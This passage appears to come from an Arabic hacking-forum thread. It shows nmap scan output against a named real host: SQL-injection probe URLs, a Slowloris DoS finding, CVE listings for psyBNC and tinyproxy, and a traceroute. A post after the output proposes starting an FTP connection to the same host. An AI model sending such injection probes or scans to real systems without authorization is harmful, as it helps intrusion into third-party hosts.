|     http://c83-251-235-155.bredband.tele2.se:903/man/html.2/?O=A&C=D%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/man/html.2/?O=A%27%20OR%20sqlspider&C=M
|     http://c83-251-235-155.bredband.tele2.se:903/man/html.2/?O=A&C=M%27%20OR%20sqlspider
|     http://c83-251-235-155.bredband.tele2.se:903/man/html.2/?O=D%27%20OR%20sqlspider&C=N
|_    http://c83-251-235-155.bredband.tele2.se:903/man/html.2/?O=D&C=N%27%20OR%20sqlspider
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-server-header: Apache/2.0.36 (Unix)
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /: Root directory w/ directory listing
|   /doc/: Potentially interesting directory w/ listing on 'apache/2.0.36'
|   /icons/: Potentially interesting directory w/ listing on 'apache/2.0.36'
|   /man/: Potentially interesting directory w/ listing on 'apache/2.0.36'
|_  /manual/: Potentially interesting folder
3017/tcp  open  event_listener?
| fingerprint-strings:
|   GenericLines:
|     Trespassers will be shot. Survivors will be SHOT AGAIN!
|   NULL:
|     What would men be without women? Scarce, sir . mighty
|     scarce.
|_    Mark Twain
5000/tcp  open  kvm                Raritan KVM
5001/tcp  open  http               ZNC IRC bouncer http config 0.097 or later
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-cookie-flags:
|   /:
|     5001-SessionId:
|_      httponly flag not set
|_http-server-header: ZNC - http://znc.in
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
6666/tcp  open  irc                UnrealIRCd
6667/tcp  open  irc                UnrealIRCd
6668/tcp  open  irc                UnrealIRCd
6669/tcp  open  irc                UnrealIRCd
6789/tcp  open  ssl/ibm-db2-admin?
8000/tcp  open  irc-proxy          psyBNC 2.2.2
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
| vulners:
|   psyBNC 2.2.2:
|_        CVE-2002-0197    7.5    https://vulners.com/cve/CVE-2002-0197
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
8192/tcp  open  eggdrop            Eggdrop irc bot console 1.6.21 (botname: Swindlesc; patch: RC1)
8888/tcp  open  http-proxy         tinyproxy 1.6.5
|_http-server-header: tinyproxy/1.6.5
| vulners:
|   cpe:/a:banu:tinyproxy:1.6.5:
|         CVE-2011-1843    6.8    https://vulners.com/cve/CVE-2011-1843
|         CVE-2012-3505    5.0    https://vulners.com/cve/CVE-2012-3505
|         SSV:20524    2.6    https://vulners.com/seebug/SSV:20524    *EXPLOIT*
|_        CVE-2011-1499    2.6    https://vulners.com/cve/CVE-2011-1499
12345/tcp open  eggdrop            Eggdrop irc bot console 1.8.1 (botname: RHEADYN)
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port646-TCP:V=7.94SVN%I=7%D=8/3%Time=688F18B5%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9E,"\+OK\x20TCPIP\x20POP\x20server\x20V6\.0-26,\x20OpenVMS\x20V9\.2
SF:-3\x20x86_64\x20at\x20x86vms\.polarhome\.com,\x20up\x20since\x202025-07
SF:-24\x2010:16:27\x20<429\._3_AUG_2025_10_07_05_36@x86vms\.polarhome\.com
SF:>\r\n")%r(GenericLines,9E,"\+OK\x20TCPIP\x20POP\x20server\x20V6\.0-26,\
SF:x20OpenVMS\x20V9\.2-3\x20x86_64\x20at\x20x86vms\.polarhome\.com,\x20up\
SF:x20since\x202025-07-24\x2010:16:27\x20<429\._3_AUG_2025_10_07_05_36@x86
SF:vms\.polarhome\.com>\r\n")%r(HTTPOptions,C0,"\+OK\x20TCPIP\x20POP\x20se
SF:rver\x20V6\.0-26,\x20OpenVMS\x20V9\.2-3\x20x86_64\x20at\x20x86vms\.pola
SF:rhome\.com,\x20up\x20since\x202025-07-24\x2010:16:27\x20<429\._3_AUG_20
SF:25_10_07_16_47@x86vms\.polarhome\.com>\r\n-ERR\x20Unknown\x20command:\x
SF:20\"options\"\.\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port705-TCP:V=7.94SVN%I=7%D=8/3%Time=688F18B4%P=x86_64-pc-linux-gnu%r(N
SF:ULL,16,"SSH-1\.5-OSU_1\.5alpha6\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3017-TCP:V=7.94SVN%I=7%D=8/3%Time=688F18AF%P=x86_64-pc-linux-gnu%r(
SF:NULL,800,"\x20\rWhat\x20would\x20men\x20be\x20without\x20women\?\x20\x2
SF:0Scarce,\x20sir\x20\.\x20mighty\n\rscarce\.\n\r\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20--\x20Mark\
SF:x20Twain\n\r\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(GenericLines,800,"\x20
SF:\rTrespassers\x20will\x20be\x20shot\.\x20Survivors\x20will\x20be\x20SHO
SF:T\x20AGAIN!\n\r\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
Aggressive OS guesses: Linux 5.1 (92%), Linux 3.10 - 4.11 (90%), Linux 3.2 - 4.9 (89%), HP P2000 G3 NAS device (89%), Linux 3.16 - 4.6 (88%), Linux 2.6.32 (88%), Linux 2.6.32 - 3.1 (88%), Infomir MAG-250 set-top box (88%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (88%), Linux 3.7 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 18 hops
Service Info: Hosts: redhat.polarhome.com, mailhost.polarhome.com, freebsd.polarhome.com, irc.polarhome.com; OSs: Linux, Unix; Device: PBX; CPE: cpe:/o:linux:linux_kernel, cpe:/o:fedoraproject:fedora_core:16

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   3.19 ms   _gateway (192.168.1.1)
2   6.34 ms   100.71.0.1
3   112.12 ms 10.45.10.60
4   14.79 ms  10.36.20.2
5   7.38 ms   10.45.28.77
6   13.36 ms  213.144.181.11
7   45.95 ms  et-2-0-19.edge4.Marseille1.Level3.net (212.133.4.209)
8   59.42 ms  185.100.113.145
9   64.50 ms  185.100.113.145
10  64.29 ms  ams13-peer-1.hundredgige2-3-0.tele2.net (80.249.209.139)
11  91.61 ms  ams13-agg-1.bundle-ether4.tele2.net (91.129.14.30)
12  90.55 ms  brn-core-1.bundle-ether5.tele2.net (91.129.12.68)
13  91.73 ms  bck3-core-1.bundle-ether6.tele2.net (91.129.12.116)
14  85.92 ms  obo388-core-2.bundle-ether1.tele2.net (91.129.12.17)
15  85.76 ms  hud792-cagg-1.bundle-ether2.tele2.net (91.129.12.137)
16  81.04 ms  ch-glo-cagg-2.bundle-ether2.tele2.net (91.129.14.135)
17  81.50 ms  orb-bbr-2-be1.net.comhem.se (213.200.163.86)
18  91.34 ms  c83-251-235-155.bredband.tele2.se (83.251.235.155)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 722.40 seconds

x32x01 · الأحد في 13:04

يلا نبدأ على بركه الله
يلا نجرب الأمر ده ونقول وصلنا لأيه:

Code:

root@PC:~# ftp 83.251.235.155